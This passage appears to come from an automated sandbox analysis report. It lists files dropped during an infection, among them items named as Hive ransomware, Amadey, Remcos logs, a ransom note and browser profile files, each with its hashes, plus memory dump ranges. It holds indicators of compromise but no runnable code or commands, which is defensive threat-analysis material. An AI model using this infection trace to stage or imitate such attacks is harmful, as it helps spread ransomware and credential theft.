SHA512 355c1f39946662b0c16c6a5fa4c387aad03e1dc1c1dd74d650a784fc9e718b890a877937d8d3a26ab62a22385f03e02e6d0faa6d9e07ea3b16151c909596097a

memory/5308-4257-0x00000000004B0000-0x000000000067E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\Neverlose%20Loader.exe

MD5 f5b150d54a0ba2d902974cbfd6249c56
SHA1 92e28c3d9ff4392eed379d816dda6939113830bd
SHA256 1ba41fb95f728823e54159eb05c34a545ddb09cb2d942b8d7b6de29537204a80
SHA512 57aade72ad0b45fdf1a6fdfa99e0d72165a9d3a77efd48c0fb5976ab605f6a395ab9817ea45f1f63994c772529b6b0c6448fa446d68c9859235ce43bf22cb688

memory/4228-4280-0x0000000000B00000-0x0000000000B84000-memory.dmp

memory/5216-4286-0x00000000004E0000-0x00000000006AE000-memory.dmp

memory/5308-4285-0x00000000004B0000-0x000000000067E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Hezron

MD5 160d0cde45bf6a648bc8f7b0a0c4d9a4
SHA1 c25b4bea398c86ae95fd60d8e99c3fc685faec9b
SHA256 f1d0aa672e703eb40cf1bba7462e83ea61d6091a9336f2d81f19a17a3e3ec281
SHA512 801d1a92b00cb52dd89b7d884b5b88c452843acbac5f79408215cca82fb7cb9b10ab3179710e2cdfcfedd0bf94a39d158b298a64ae656324a3455da524c5c3fb

memory/5712-4297-0x00000000004E0000-0x00000000006AE000-memory.dmp

memory/5216-4299-0x00000000004E0000-0x00000000006AE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\262965725.exe

MD5 84897ca8c1aa06b33248956ac25ec20a
SHA1 544d5d5652069b3c5e7e29a1ca3eea46b227bbfe
SHA256 023ad16f761a35bd7934e392bcf2bbf702f525303b2964e97c3e50d2d5f3eda1
SHA512 c17d0e364cf29055dece3e10896f0bbd0ebdb8d2b1c15fe68ddcd9951dd2d1545362f45ad21f26302f3da2eb2ec81340a027cbd4c75cc28491151ecabae65e95

C:\Users\Admin\AppData\Local\Temp\aut75C7.tmp

MD5 f5d85272c3f005a8068f0d6032b150a5
SHA1 75afdb8ed0cced702f03f514228fa2609a53c0eb
SHA256 b0457a191914cf3cf2ca7a39c46035cbb765576e61470aaf511e60b1a7b3059e
SHA512 f04fea99a9c2618c92f5b72328655a2c22eaf224602316af001ee24d472f301ec28ed970e1b34508a33436fe211592b13c52600c410c0987266afb4d1bf9b4c6

C:\Users\Admin\AppData\Local\Temp\Files\steel.exe

MD5 d7a287ff0ef45e55578eea2ab0767755
SHA1 a0c1dc255927be3cbd3d75d623e60012e2fef795
SHA256 bfbb27e9d31a37b4c2d2ff36ede513ef52382365a1da2904ebc5b1a807211537
SHA512 9b75b0085a99fd2e2a09ccd6c6e127ace40111839a45752c37ada20e49fbc6f21fa84a9203915caf35589845bdc6ba7ecdbcc4a20e30d912ca386a9e2bacd510

C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe

MD5 c9495b3a992ea3e2ef2788c7ba7ed840
SHA1 3d2e2ff99cd28f81a906d8d928ad7d42ff5226be
SHA256 3398ed7cffcc75371d831fda315805c714268c321c863f60c806ae73cfaae4cd
SHA512 a11e2b0424d7342bbddc9dd0541902128238281dd9aa620b81213d937a997f9da1c1d3954a05bd57383eb27cd3270d2a29b40a16893237c435fcfdb6344a1746

C:\Users\Admin\AppData\Local\Temp\is-2M6HH.tmp\steel.tmp

MD5 b4d4f779ea9e1f6ac0828b0b21ee319a
SHA1 7862ea3b0c9eae8e4e24125d63e5a8ddbc0bf588
SHA256 422cf23be87c93223d11daa8e74c3c8c5af80c70cd8eff1f501da70e612014a6
SHA512 ec52c6f8b83c5088be39988f067d93c6a183a95c98b5bbe4119625f7925c3f274f969271722c3171300cf4943d076b0ddd1a6d5ed38ede849a3976badc99d065

memory/2920-4350-0x00000207FD070000-0x00000207FD0A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-S3V7V.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\Users\Admin\AppData\Local\Video Minimizer 1.77\videominimizer32.exe

MD5 2cf9d99bb8eb94ac3454d4933e8790e6
SHA1 5f0d9bd16b049af3a6f98bd47ea33971327cf6e8
SHA256 51ae3f39885b685773f969866107cd080e4e93f8857549cf753316379e76cf75
SHA512 3cf1488c8d5c48474668f9647f270cbda78352e3f128a5ab44e5847220564cbd91fe8cefd65b9bcdc7863c49a30d7e84207f3e4b2fb035b002ac6fc217902ada

C:\Users\Admin\AppData\Local\Video Minimizer 1.77\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

memory/4480-4390-0x0000000000400000-0x000000000072D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\ControlledAccessPoint.exe

MD5 f275736a38a6b90825076e8d786ad5c5
SHA1 c0d862ceab728736580f043316cdc099b2ab8924
SHA256 b48eeab60494eb44d8d5ef10a87fd46ad1aa33fdcf7245efb636f69f2fd55f42
SHA512 b6662ee0426b45c5629808718613a687808deeaca692bb00d26ac5c9098b8a36a126ef80eca470db085aa5a84e38a9ee088a165cea821bf1226055a4fd842711

memory/4056-4403-0x0000000000DC0000-0x0000000000E5A000-memory.dmp

memory/4056-4405-0x000000001C5F0000-0x000000001C666000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Registry.exe.log

MD5 baf55b95da4a601229647f25dad12878
SHA1 abc16954ebfd213733c4493fc1910164d825cac8
SHA256 ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924
SHA512 24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\chrome11.exe.log

MD5 d63757807de58ed2437162d1bbfffdee
SHA1 1c251282d981051f8d7c3ad19f38475d88a2e640
SHA256 be8f787bc08be98cad11b4204cfa7720362747cc9a8c8c36412d843f8b8ac414
SHA512 6b0f095b65796a62e74d0432115a9b51c2b12fc8c96fb94393ba8a392d6c1e12ee43fa579116a7814639b9b89ebe6906c20dbe0437fa2501ac4ac36328434064

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\1989129625.exe.log

MD5 fff5cbccb6b31b40f834b8f4778a779a
SHA1 899ed0377e89f1ed434cfeecc5bc0163ebdf0454
SHA256 b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76
SHA512 1a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9

C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe

MD5 96e4917ea5d59eca7dd21ad7e7a03d07
SHA1 28c721effb773fdd5cb2146457c10b081a9a4047
SHA256 cab6c398667a4645b9ac20c9748f194554a76706047f124297a76296e3e7a957
SHA512 3414450d1a200ffdcc6e3cb477a0a11049e5e86e8d15ae5b8ed3740a52a0226774333492279092134364460b565a25a7967b987f2304355ecfd5825f86e61687

C:\Users\Admin\AppData\Local\Temp\unique_laptops.txt

MD5 d633b3221aae10dc2a33acfadb3f17e4
SHA1 96bb716f6aa7200c1b4a9372a2ca976a16c075a9
SHA256 a98a79ddf85bc0544b9de6e01fa99ac583cc76a8dae41a19d3d225816a8ad63a
SHA512 49d71b66b22a2f7a963fdf8ade0d0be620e3652a783b9f49e39bbcbcd3a74ad2a30ec8efc48aa398227f93689fa278e62cb7f97176863df9f97e194e89037dd8

memory/4664-4425-0x0000000000250000-0x0000000000550000-memory.dmp

memory/5712-4442-0x00000000004E0000-0x00000000006AE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe

MD5 58e8b2eb19704c5a59350d4ff92e5ab6
SHA1 171fc96dda05e7d275ec42840746258217d9caf0
SHA256 07d4b7768e13d79ac5f05f81167b29bb6fbf97828a289d8d11eec38939846834
SHA512 e7655762c5f2d10ec246d11f82d437a2717ad05be847b5e0fd055e3241caaca85430f424055b343e3a44c90d76a0ba07a6913c2208f374f59b61f8aa4477889f

memory/4592-4455-0x00000000057F0000-0x0000000005882000-memory.dmp

memory/4592-4454-0x0000000005D00000-0x00000000062A4000-memory.dmp

memory/4592-4456-0x0000000005730000-0x000000000573A000-memory.dmp

memory/4592-4453-0x0000000000E50000-0x0000000000EA2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tmp9BBE.tmp

MD5 1420d30f964eac2c85b2ccfe968eebce
SHA1 bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256 f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA512 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

memory/4592-4473-0x00000000063B0000-0x0000000006426000-memory.dmp

memory/4592-4475-0x0000000006C70000-0x0000000006C8E000-memory.dmp

memory/4592-4478-0x00000000073F0000-0x0000000007A08000-memory.dmp

memory/4592-4482-0x0000000006F40000-0x000000000704A000-memory.dmp

memory/4592-4483-0x0000000006E80000-0x0000000006E92000-memory.dmp

memory/4592-4484-0x0000000006EE0000-0x0000000006F1C000-memory.dmp

memory/4592-4485-0x0000000007050000-0x000000000709C000-memory.dmp

memory/4664-4495-0x0000000000250000-0x0000000000550000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe

MD5 72a6fe522fd7466bf2e2ac9daf40a806
SHA1 b0164b9dfee039798191de85a96db7ac54538d02
SHA256 771d0ba5b4f3b2d1c6d7a5ebe9b395e70e3d125540c28f1a0c1f80098c6775ce
SHA512 b938a438e14458120316581cb1883579a2ce7f835b52f4ab1cde33aa85febcad11f8a8b0a23fb9a8acafa774fe9cbd1c804a02fd8e6f5d8df60924c351f0126e

memory/3364-4507-0x0000000000230000-0x0000000000398000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\test26.exe

MD5 b9054fcd207162b0728b5dfae1485bb7
SHA1 a687dc87c8fb69c7a6632c990145ae8d598113ce
SHA256 db032c18992b20def16589678eb07e0d3f74e971f4efc07196d7cd70a16753bc
SHA512 76e33c6b965ffb47f0a2838ca0571134cdf32ab9f6808bc21e6ca060b4d23e15cd686bd6d57571dbc613aa6e17a3702264079f2bc411de1a72a7d1e01afc469f

memory/4480-4518-0x0000000000400000-0x000000000072D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\clip.exe

MD5 6ca0b0717cfa0684963ff129abb8dce9
SHA1 69fb325f5fb1fe019756d68cb1555a50294dd04a
SHA256 2500aa539a7a5ae690d830fae6a2b89e26ba536f8751ba554e9f4967d48e6cfa
SHA512 48f9435cf0a17aed8ff4103fa4d52e9c56f6625331a8b9627b891a5ccada14f14c2641aac6a5c09570f26452e5416ac28b31fe760a3f8ba2f5fe9222d3c336ee

C:\Users\Admin\AppData\Local\Temp\Files\random.exe

MD5 ae894f6f2d4c93aa3845f9889d10da88
SHA1 54acac7e5d04ff2ee799b309e27397a05e6a786d
SHA256 cac0d0d0a60d2b6413f9c4831ac35ef9b5129dc8ce2873980c216d25ebb827ca
SHA512 c0332417eb9c5e87585772f21688504355d2943d58ea7203284b80acc9b582dcf4ec6b90ec1107776cd5c802227bd155069b3d3a84c7fe3dac048423ed7e53d4

memory/5304-4536-0x0000000000910000-0x0000000000DB1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nd5zb2ol.0le.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/6112-4546-0x00000180EC290000-0x00000180EC2B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\test_again2.exe

MD5 52a2fc805aa8e8610249c299962139ed
SHA1 ab3c1f46b749a3ef8ad56ead443e26cde775d57d
SHA256 4801ead85ca08f439f695f198f5a87032c688143b3fe679b2b0872102c0d58ea
SHA512 2e6897092f3e25da023b003975f2fa5f45a4a2a115bc56460d15b21933da517fd7e1e98dcdad49196236614a516c710c19f4bfd4603776b620eb6d9c31c02cdf

C:\Users\Admin\AppData\Local\Temp\Files\14082024.exe

MD5 9bba979bb2972a3214a399054242109b
SHA1 60adcedb0f347580fb2c1faadb92345c602c54e9
SHA256 17b71b1895978b7aaf5a0184948e33ac3d70ce979030d5a9a195a1c256f6b368
SHA512 89285f67c4c40365f4028bc18dd658ad40b68ff3bcf15f2547fc8f9d9c3d8021e2950de8565e03451b9b4ebace7ed557df24732af632fdb74cbd9eb02cf08788

memory/216-4568-0x0000000000CD0000-0x0000000000D22000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe

MD5 bb63e746e54ae6a1ff2d5d01fc4b6c61
SHA1 b22879f1eb81aabb7cf37fd531f85724f84fdc09
SHA256 18aeb7be496d51bada50f3781764bb7771f74d7050e3ceefa51725b3f86a59f6
SHA512 a7ad6ecb848789cd32090863ef5196dab836a4a5937b988516e0d72f69b2fb6459db9baf0ff8281d301134cbf9a66d2b889fb647ad0f637cf0e03f46cea23e42

memory/5304-4619-0x0000000000910000-0x0000000000DB1000-memory.dmp

C:\ProgramData\remcos\logs.dat

MD5 2fd947b90607000d0ab8bbb0bc66b283
SHA1 9d3f1d7712efceba9c1e602a41bb8db6bfdcae9c
SHA256 a7796555d5ed8c146925ec8fa0c6426b5a24e3f6d811d8925999db37d2a0ecf0
SHA512 d147a8785eacb9d42d38c5d988ba6410a5b2430c43ae4ff1bf5cabab8d6b69695c3054c1935e4c7cb6afc54deeb397a3786c40bd4b1fa4c86f51e9207f19840f

C:\Users\Admin\AppData\Local\Temp\Files\Setup2.exe

MD5 37263ede84012177cab167dc23457074
SHA1 5905e3b2db8ff152a7f43f339c053e1d43b44dfc
SHA256 9afd9e70b6f166cfc6de30e206dff5963073a6faeff5bcc93ee131df79894fc2
SHA512 6b08af27c18fcaadcdc72af7e17cf9fe856526eab783ed9eb9420cf44fd85bf8a263c88d0f98bc367156bc01d61c6e0c8d098246760b20ed57efae292b68fe7e

memory/3364-4683-0x00000000050A0000-0x00000000050C2000-memory.dmp

memory/3364-4682-0x0000000004F60000-0x0000000005036000-memory.dmp

memory/2944-4687-0x0000000000400000-0x000000000040E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\gweadtrgh.exe

MD5 3a94ac80a1bbe958b6544874f311be69
SHA1 bc6352ee84bed107a4b30b545934698c4e664baf
SHA256 1839ee5c3534ad1a6929c9de33bce63cf6f96cce1ae3dc8240f4cf352250db0f
SHA512 f31d93889251ec2c6581107a7a0122be63d5f7b8253403736d38f1d2ffa2cb693e30a205ceb36b823265fd58bb2854cc44064988110daf3fe1c8ea02e7d2227c

memory/3476-4697-0x0000000000400000-0x000000000066D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\050598569159

MD5 239d42d74d13a6cb283992ac00fb9813
SHA1 ef06e1a356708a9417d3346b8fe9a7eb014002a9
SHA256 5b35c2dce6ba78dcbea7bd55476839430aba5ea6573b3506afa4abc397965c8f
SHA512 534737ee57642669e79f82601f27cc735471d3d1016af0d31b94ae355631e9135cec75fa8ea7a2cbcb9bcb47715c10e7a2a04ea354594ee4f385d3a3031afda6

C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe

MD5 7ae9e9867e301a3fdd47d217b335d30f
SHA1 d8c62d8d73aeee1cbc714245f7a9a39fcfb80760
SHA256 932cb7b1080180487be4b5754bd92600409bafda80d412018a792a8930c6a46c
SHA512 063648705e1817a1df82c9a595e4bbe8e0b1dbb7e31a6517df59905ebe7f22160f4acb55349d03dfe70744a14fd53c59a4c657c7a96646fcccf1c2214fc803dd

memory/4368-4717-0x00000000002A0000-0x00000000005C4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\AutoUpdate.exe

MD5 a46fbc93be901a82afe29942b96067dd
SHA1 89fa610d6cec3205c2662e9997c55113fbe211ae
SHA256 2d3e29c33e0de171b8f4a1c31217df92a2adb6540860ca9ae1365170f9f80aee
SHA512 228d6beaf5d1e1d60d53cd7628f9dee27e1045f7bf1aeddd464ca43e257860f94b5c66013abe13e0b55d812cd4e4c6ee080563057c14ab355ff279e2093776d3

C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe

MD5 c07e06e76de584bcddd59073a4161dbb
SHA1 08954ac6f6cf51fd5d9d034060a9ae25a8448971
SHA256 cf67a50598ee170e0d8596f4e22f79cf70e1283b013c3e33e36094e1905ba8d9
SHA512 e92c9fcd0448591738daedb19e8225ff05da588b48d1f15479ec8af62acd3ea52b5d4ba3e3b0675c2aa1705185f5523dcafdf14137c6e2984588069a2e05309f

C:\Users\Admin\AppData\Local\Temp\Files\Hive%20Ransomware.exe

MD5 2f9fc82898d718f2abe99c4a6fa79e69
SHA1 9d336b8911c8ffd7cc809e31d5b53796bb0cc7bb
SHA256 88f7544a29a2ceb175a135d9fa221cbfd3e8c71f32dd6b09399717f85ea9afd1
SHA512 19f0879b1c54d305ab7a97a0d46ab79c103d4687fe37d5f9ef1934904eea48a1c66b1ac2de3dace6dc0d91623309287044c198cb0b3fc9f8453fbc9d1c0cae8b

memory/5380-4770-0x0000000000F50000-0x00000000011B3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\svhost.exe

MD5 e3cfe28100238a1001c8cca4af39c574
SHA1 9b80ea180a8f4cec6f787b6b57e51dc10e740f75
SHA256 78f9c811e589ff1f25d363080ce8d338fa68f6d2a220b1dd0360e799bbc17a12
SHA512 511e8a150d6539f555470367933e5f35b00d129d3ed3e97954da57f402d18711dfc86c93acc26f5c2b1b18bd554b8ea4af1ad541cd2564b793acc65251757324

memory/1064-4781-0x00000000000E0000-0x0000000000164000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\boleto.exe

MD5 2a4ccc3271d73fc4e17d21257ca9ee53
SHA1 931b0016cb82a0eb0fd390ac33bada4e646abae3
SHA256 5332f713bef3ab58d7546f2b58e6eaf55c3e30969e15b6085a77e7fd9e7b65b4
SHA512 00d6728fa5c2692dab96107187126a44e09976f0d26875f340b3ad0d3f202abb4fbc5426f2934096087ef6e404bc1dc21b6e6ebbacba172c383d57bdef185a74

memory/1188-4791-0x0000000000800000-0x0000000000818000-memory.dmp

memory/5380-4838-0x0000000000F50000-0x00000000011B3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\ama.exe

MD5 077b16532e2f2bc14848b1b90faaa4db
SHA1 4f98a243cb26ad1b2c5c2671ebf16b1c4631837d
SHA256 8e9ed73e06887f551baaccf5705e6dd5aea7a2e186d92afb0c9655f106408939
SHA512 acb531b322efa44390a09a1ff62947ebf009efc9cd591e971deff05d8ef6c8b0afb0b58fe86359e92cd6383481f8a01fea29e2c56b08e7c2b33cf64a4f0705de

memory/4688-4851-0x00000000008C0000-0x0000000000D79000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe

MD5 54b809ae715bbf1575987141ebc06d9c
SHA1 b3dde84144467b3073cce84e1ef1981cd7949930
SHA256 9a3d5b3bb4061c11f0828bfe358d3bc7f9ac4e62be67aa35cc4e53b5d140cb67
SHA512 e5ead6ece85209e64a51487903fe080b4d2a721583be30d41915d1b695777c86651cf970a3b634ec019a2f0f9966dedafdfa0d63374593de3c95d1086ef9ee87

memory/3272-4862-0x00000000003E0000-0x0000000000461000-memory.dmp

memory/4688-4874-0x00000000008C0000-0x0000000000D79000-memory.dmp

memory/5504-4875-0x0000000000B10000-0x0000000000FC9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\builder.exe

MD5 c2bc344f6dde0573ea9acdfb6698bf4c
SHA1 d6ae7dc2462c8c35c4a074b0a62f07cfef873c77
SHA256 a736269f5f3a9f2e11dd776e352e1801bc28bb699e47876784b8ef761e0062db
SHA512 d60cf86c0267cd4e88d21768665bbb43f3048dace1e0013b2361c5bfabf2656ff6215dfb75b6932e09545473305b4f707c069721cdde317b1df1709cd9fc61c0

C:\Users\Admin\AppData\Local\Temp\Files\crack.exe

MD5 53e21b02d31fa26942aebea39296b492
SHA1 150f2d66d9b196e545ac5695a8a0001dbd2ef154
SHA256 eecdeeffe3f7627f27eb2683d657a63503744e832702890f4bc97724aeaed73d
SHA512 030f9ab458ecc9954089e88075ca5a9e8bf8fe07483b96a563bc77feaf59cdc4916ed2cc139e7192dcb6f9dc388b8beb837754cf8e79c7c2326ebd02ca5821d1

memory/3272-4898-0x00000000003E0000-0x0000000000461000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\kohjaekdfth.exe

MD5 4992863093cb396628acfb86b56af1e6
SHA1 4f61861be36c992e420dd387997322130ba2164d
SHA256 c4fcb04af557153060abc9488b017c3875074dcda7a84c59a18cee798e95ef56
SHA512 d6dd52bdd607837ba685ee672410db23d3cc0a1de2a01ef5ad46e55401e205ac14795591fb03e3deb330a93c1a587d6e4d5a065a42d7b2da5ad069ae60cae8fc

C:\Users\Admin\AppData\Local\Temp\Files\popapoers.exe

MD5 d9a23524fc7e744b547ee35a00c80cae
SHA1 ac189d3ed4a5c8d094dbb0f9197c88f92f567929
SHA256 b41ad61bdf186fe82b70dc045791e0bab5d9566ba56b010b19c494dbbd70db31
SHA512 f815ad8516aa3d4c4f35abc2a42b8e6119cd2a022d9475e2c9cc25649736a89cb7b46f2b3def79bfdcb82bc9798de397a8b95f6fe04ba337c90d1c1b85cb4861

memory/5604-4931-0x0000000000510000-0x000000000054C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe

MD5 759f5a6e3daa4972d43bd4a5edbdeb11
SHA1 36f2ac66b894e4a695f983f3214aace56ffbe2ba
SHA256 2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d
SHA512 f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385

memory/5768-4954-0x0000000002C90000-0x0000000002CC6000-memory.dmp

memory/5768-4955-0x0000000005680000-0x0000000005CA8000-memory.dmp

memory/5768-4969-0x0000000005DE0000-0x0000000005E02000-memory.dmp

memory/5768-4978-0x0000000006060000-0x00000000060C6000-memory.dmp

memory/5768-4974-0x0000000005E80000-0x0000000005EE6000-memory.dmp

memory/5768-4979-0x00000000061D0000-0x0000000006524000-memory.dmp

memory/5768-4983-0x0000000006550000-0x000000000656E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\4434.exe

MD5 607c413d4698582cc147d0f0d8ce5ef1
SHA1 c422ff50804e4d4e55d372b266b2b9aa02d3cfdd
SHA256 46a8a9d9c639503a3c8c9654c18917a9cedbed9c93babd14ef14c1e25282c0d5
SHA512 d139f1b76b2fbc68447b03a5ca21065c21786245c8f94137c039d48c74996c10c46ca0bdd7a65cd9ccdc265b5c4ca952be9c2876ced2928c65924ef709678876

memory/5768-4995-0x0000000007530000-0x00000000075C6000-memory.dmp

memory/5768-4997-0x0000000007490000-0x00000000074B2000-memory.dmp

memory/5768-4996-0x0000000006A40000-0x0000000006A5A000-memory.dmp

memory/5504-5010-0x0000000000B10000-0x0000000000FC9000-memory.dmp

C:\$Recycle.Bin\HOW_TO_DECRYPT.txt

MD5 80207d0f8ea42bdfeaf9f5c586230aca
SHA1 747481fe2b0b6d81c3b19ba62d1e49eab6a5461f
SHA256 25edefb3b0678dfe0d927ff48ce67254359ba379df9468f634d02c026f0e7131
SHA512 73f68ce9e98d2346be1762bd54bb06ef83ae939dfbcf9b786d9b773fa454352613387d264b7a87a1c08950226553817bf01f5aa4107bc12de36a1689e2137304

memory/5208-5049-0x0000000000B10000-0x0000000000FC9000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e443ee4336fcf13c698b8ab5f3c173d0
SHA1 9bf70b16f03820cbe3158e1f1396b07b8ac9d75a
SHA256 79e277da2074f9467e0518f0f26ca2ba74914bee82553f935a0ccf64a0119e8b
SHA512 cbf6f6aa0ea69b47f51592296da2b7be1180e7b483c61b4d17ba9ee1a2d3345cbe0987b96f4e25de1438b553db358f330aad8a26e8522601f055c3d5a8313cdd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 56a4f78e21616a6e19da57228569489b
SHA1 21bfabbfc294d5f2aa1da825c5590d760483bc76
SHA256 d036661e765ee8fd18978a2b5501e8df6b220e4bca531d9860407555294c96fb
SHA512 c2c3cd1152bb486028fe75ab3ce0d0bc9d64c4ca7eb8860ddd934b2f6e0140d2c913af4fa082b88e92a6a6d20fd483a1cb9813209f371a0f56374bc97d7f863b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 76e5d4090610a67f1948e8897daa49d4
SHA1 631178b15a13c0ff63551039540fbde0126d616e
SHA256 14fa5eff3538b3e4b59e179ada849f5f088d26058cc26a756eb44dd2acf6f3c2
SHA512 a318f4e649f1e61b90e9c288526e292156f310166bc768e4bed93f44a97a2e096d14d7f1a08a0ef8ef0488cbc2ec9b6f14bd0b6ebaea1e603e5e0c0db23ac0a3

C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll

MD5 0d3418372c854ee228b78e16ea7059be
SHA1 c0a29d4e74d39308a50f4fd21d0cca1f98cb02c1
SHA256 885bf0b3b12b77ef3f953fbb48def1b45079faa2a4d574ee16afdbafa1de3ac7
SHA512 e30dced307e04ae664367a998cd1ba36349e99e363f70897b5d90c898de2c69c393182c3afba63a74956b5e6f49f0635468e88ed31dd1e3c86c21e987ddd2c19

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\HOI3BGS3\76561199803837316[1].htm

MD5 d5085dc60227b55713a398134e08aac0
SHA1 f412a1a7972b7f7d4b63e3a101a0afc99e3c3a17
SHA256 7c37b58840ded35b3677d9c7137485899680773ed09162f1447bb45137e3cf35
SHA512 acaa2037197420d4a8ca8cdb13b873c4bc31b48cb56f2a98cf4ccb9315963e61b71cdeb8a4f5961e9ec059c3582a196fd5b217415059ebd51c249dd2965a457a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 58e9cd57998ac948c9688a47c547101f
SHA1 ca199511d02e4a0fb5a2f021c1ae9a0a2e13da02
SHA256 30bdac6c927fd3eacc8f491ed54ad7034969bb7f72e02ed2ca62963b3d51463b
SHA512 fa52fe88b3db945a24181b21c0dc8ec4205e5e142f8103b04e882f39d3ee026e38d3ef6a96aee81d8cb9773424b07f1b2d95c46841152075710616568d338ef4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ba07e2fb3f3d828fcf9afd91ae81fe83
SHA1 7429354bbfca1689651ab8dbc69cb44e417145fb
SHA256 b090579627911f4f89845e439e2466b8b0533a8c55beb46ac80ab5c4c586488e
SHA512 394d2aaacc9e6a41b341d536a31d878fcde59529b31b02b82af2451edfac095d2a5e55b3b360cc49573c59c20e8f15396c9b4a6e8a201f455ee21ede75c5085f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 327eb1882458e7b37c1a356b0bd3e793
SHA1 3fea461b5f2bfd3944c8a6071705bb636ed0d3bd
SHA256 5c07d07de7b6a699f212f1d0daf458860d95b6331587e7134a5814256bc283b5
SHA512 c43d7d1fc7b1d78a512758def58f4f58cb4e3d19016df1231b37ae2456734b2961dbe33ceab32554e90dd7755bd533983cb3d4dd084d3a887473635215683754

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 41b5be1c63bff041dc9fa76708c19bc2
SHA1 61e26ab19299f16d978e55d4ced98b0317303138
SHA256 195d16224a98218d3fc17c686aef3747b61305e27b84c5129c729b017c8a1514
SHA512 2ed37c0598646f035578b28c38f18164f5442cfecbcdd6122af50e1c2c65ba40aad93c2ee0f5eaaf899be1aa11c6fd58de39bf2d7365703960640c496f801d66

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5a181d.TMP

MD5 400548cdbafb301b25687f660edb5128
SHA1 2123bc5d10cbe1263654dc76d0154537ede54129
SHA256 ff907f59938d19ed659ad72c9af573f80e397e88e2986b6e5bbef2242a4fa9d7
SHA512 13efc255df9fe16f13beb0c3f41b3dc8c61c148d166ccfc5b491abb5459fb4669d5e65db7c1de096d073feed115d0cdc5becf9d1b519361f777371b4a0ef537f

C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe

MD5 b00f13f32231a2de38e2086dd297e250
